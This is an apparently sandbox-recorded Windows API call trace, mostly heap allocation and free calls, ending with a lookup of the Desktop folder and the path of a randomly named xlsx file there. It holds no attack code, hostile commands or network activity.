[0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0187.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.845] CloseHandle (hObject=0x2a4) returned 1 [0187.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0187.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0187.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0187.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0187.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.849] CloseHandle (hObject=0x2a8) returned 1 [0187.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0187.854] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0187.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0187.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0187.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0187.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0187.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0187.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0187.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0187.864] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0187.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0187.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0187.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0187.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0187.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0187.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0187.866] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0187.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0187.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0187.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0187.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0187.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0187.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.867] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0187.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0187.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0187.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0187.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0187.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0187.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0187.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0187.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0187.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0187.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0187.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0187.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24202f0 [0187.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/lorGIZR7_Ai6fNrX6f.xlsx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lorGIZR7_Ai6fNrX6f.xlsx", lpFilePart=0x8bedfc*="lorGIZR7_Ai6fNrX6f.xlsx") returned 0x3d [0187.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | 